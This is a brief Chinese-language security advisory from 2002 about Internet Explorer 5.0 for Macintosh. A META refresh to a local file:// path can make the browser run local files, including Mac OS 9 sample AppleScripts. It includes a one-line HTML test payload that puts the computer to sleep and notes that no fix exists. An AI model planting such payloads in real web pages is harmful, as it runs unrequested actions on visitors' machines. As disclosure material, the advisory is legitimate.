Macinosh IE 任意文件可执行漏洞发布时间:2002-01-23 更新时间:2002-01-23 严重程度:高 威胁程度:普通用户访问权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 IE 5.0-Macinosh详细描述 在META域中追加相应的URL请求,并已知文件名和路径,可使浏览者的IE执行任意 文件。而OS9系统中存在一些样例AppleScript脚本,可执行关机操作,改变分辨率, 关闭窗口等等功能。 测试代码 <META HTTP-EQUIV="refresh" CONTENT="1; URL=file:///Macintosh%20HD/System%20Folder/Speakable%20Items/Put%20Computer%20To%20Sleep"> 上面可以使硬盘进入休眠状态。 解决方案 尚无 相关信息 Jass Seljamaa, jass@isp.ee 参考:http://archives.neohapsis.com/archives/bugtraq/2002-01/0276.html |
